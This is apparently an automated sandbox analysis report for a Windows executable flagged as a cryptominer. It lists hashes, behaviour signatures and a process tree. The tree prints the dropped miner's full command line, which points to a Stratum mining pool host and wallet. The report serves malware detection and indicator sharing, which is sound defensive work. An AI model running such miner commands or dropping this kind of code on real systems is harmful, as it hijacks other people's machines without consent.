Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
152s -
max time network
173s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
12/06/2022, 20:14
General
-
Target
1eb4eaaac11a804bdbf36009b6a4fcca8331f4adbefd495c3afd2c1536eb13c0.exe
-
Size
4.7MB
-
MD5
f5479f77d2bee7461763a19bdeffac80
-
SHA1
4d98de66484a9f1461d22bd51ddec7d0883022a4
-
SHA256
1eb4eaaac11a804bdbf36009b6a4fcca8331f4adbefd495c3afd2c1536eb13c0
-
SHA512
3b9fa6393d32f793980e223c4351a3ea256cf93ad6aec43bdb90fed13a518e5cde54da507efac4b81c1e912cc8eb8cf666e1768c602dd069c71bff4f132675ef
Malware Config
Signatures
-
Detected Stratum cryptominer command 1 IoCs
Looks to be attempting to contact Stratum mining pool.
-
Executes dropped EXE 2 IoCs
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in System32 directory 4 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 5 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\1eb4eaaac11a804bdbf36009b6a4fcca8331f4adbefd495c3afd2c1536eb13c0.exe"C:\Users\Admin\AppData\Local\Temp\1eb4eaaac11a804bdbf36009b6a4fcca8331f4adbefd495c3afd2c1536eb13c0.exe"1⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\JT12RG.exe"C:\Windows\SysWOW64\JT12RG.exe" 1436 |||C:\Users\Admin\AppData\Local\Temp\1eb4eaaac11a804bdbf36009b6a4fcca8331f4adbefd495c3afd2c1536eb13c0.exe|||2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\aRBuQT.exe"C:\Windows\SysWOW64\aRBuQT.exe" -a bcd -o stratum+tcp://abc.xsdong.com:9501 -u 14SUEcH7KpPB8emfB24xR754Car2bLZ5XQ.BCD -p x -i 123⤵
- Detected Stratum cryptominer command
- Executes dropped EXE
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.7MB
MD5f5479f77d2bee7461763a19bdeffac80
SHA14d98de66484a9f1461d22bd51ddec7d0883022a4
SHA2561eb4eaaac11a804bdbf36009b6a4fcca8331f4adbefd495c3afd2c1536eb13c0
SHA5123b9fa6393d32f793980e223c4351a3ea256cf93ad6aec43bdb90fed13a518e5cde54da507efac4b81c1e912cc8eb8cf666e1768c602dd069c71bff4f132675ef
-
Filesize
4.7MB
MD5f5479f77d2bee7461763a19bdeffac80
SHA14d98de66484a9f1461d22bd51ddec7d0883022a4
SHA2561eb4eaaac11a804bdbf36009b6a4fcca8331f4adbefd495c3afd2c1536eb13c0
SHA5123b9fa6393d32f793980e223c4351a3ea256cf93ad6aec43bdb90fed13a518e5cde54da507efac4b81c1e912cc8eb8cf666e1768c602dd069c71bff4f132675ef
-
Filesize
4.4MB
MD5db6b6d7a773d0608bdb6056b71ad6e5e
SHA159e0c3d36b97e3502b8fc8a34e55bc1531991e01
SHA25604817972c9f3222804fb1b82ddfce0eb90e957e722a1dbacb655aa954f564940
SHA51253a62ebf06de34ec182a5be733e91698a1c2ac8c006513e39a8921db0c52e88388fc416ffcbad76113296da3afbef7bc0addbe94e639a96f83ec0149518b22ae
-
Filesize
4.4MB
MD5db6b6d7a773d0608bdb6056b71ad6e5e
SHA159e0c3d36b97e3502b8fc8a34e55bc1531991e01
SHA25604817972c9f3222804fb1b82ddfce0eb90e957e722a1dbacb655aa954f564940
SHA51253a62ebf06de34ec182a5be733e91698a1c2ac8c006513e39a8921db0c52e88388fc416ffcbad76113296da3afbef7bc0addbe94e639a96f83ec0149518b22ae
-
Filesize
21.0MB
-
Filesize
21.0MB